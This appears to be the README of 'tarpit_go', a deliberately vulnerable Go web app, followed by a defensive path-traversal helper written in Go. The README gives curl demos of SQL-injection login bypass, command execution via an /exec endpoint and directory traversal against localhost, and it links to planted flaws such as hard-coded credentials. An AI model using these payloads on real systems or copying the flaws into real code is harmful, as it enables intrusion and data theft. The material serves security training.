Preetam / tarpit_go

Demo steps

  1. Start the containers:
       cd <tarpit_go>
       docker-compose up
  2. Visit http://localhost:3000/login to see the demo (a curl version of the demo is listed below).
  3. Tear down the environment: press Ctrl+C, then run:
       docker-compose down

curl version

  1. SQL injection demo (password='12346" OR ""="'):
       curl -X POST -d "username=admin&password=12346%22+OR+%22%22%3D+%22" http://localhost:3000/login
  2. Remote code execution:
       curl -X POST -d "cmd=ls -a" http://localhost:3000/exec
  3. Directory traversal demo (log in first):
       curl -X GET http://localhost:3000/image/../demo/demo.go
  4. Hard-coded credentials:

https://github.com/AiolosLiu/tarpit_go/blob/master/auth.go#L19

  5. Sensitive data leak:

https://github.com/AiolosLiu/tarpit_go/blob/master/auth.go#L26

  6. Insider attack:

https://github.com/AiolosLiu/tarpit_go/blob/master/vulns.go#L73

  7. Business logic flaw:

https://github.com/AiolosLiu/tarpit_go/blob/master/workflow.go#L100
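
A defensive counterpart to the directory traversal demo (the /image/../demo/demo.go request), added here as an example and not taken from the tarpit_go source: a Go helper that resolves a requested name under a base directory and rejects anything that lands outside it. `SafeJoin`, `ErrOutsideBase`, the `image` base directory and the sample names are assumptions made for illustration; the project's actual handler is not shown on this page.

```go
package main

import (
	"errors"
	"fmt"
	"path/filepath"
	"strings"
)

// ErrOutsideBase reports a name that resolves outside the base directory.
var ErrOutsideBase = errors.New("path escapes base directory")

// SafeJoin (hypothetical helper, not from tarpit_go) resolves name under base
// and rejects any result that is not base itself or a descendant of it.
func SafeJoin(base, name string) (string, error) {
	absBase, err := filepath.Abs(base)
	if err != nil {
		return "", err
	}
	// Join cleans the path, so "../" segments are collapsed before the check.
	candidate := filepath.Join(absBase, filepath.FromSlash(name))
	// Rel, not a string-prefix test on candidate: a prefix test would accept
	// the sibling directory "image_old" for base "image".
	rel, err := filepath.Rel(absBase, candidate)
	if err != nil {
		return "", err
	}
	if rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", ErrOutsideBase
	}
	return candidate, nil
}

func main() {
	// Constructed sample names, as a handler would see them after URL decoding.
	names := []string{
		"cats/1.png",              // ordinary request
		"../demo/demo.go",         // the traversal from the demo
		"a/../../demo/demo.go",    // traversal hidden behind a real segment
		"../image_old/secret.png", // sibling directory sharing the prefix
		"..hidden/logo.png",       // legal name that merely starts with ".."
	}
	for _, n := range names {
		p, err := SafeJoin("image", n)
		fmt.Printf("%-26q -> %q err=%v\n", n, p, err)
	}
}
```

The check is lexical: it does not resolve symlinks inside the base directory.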
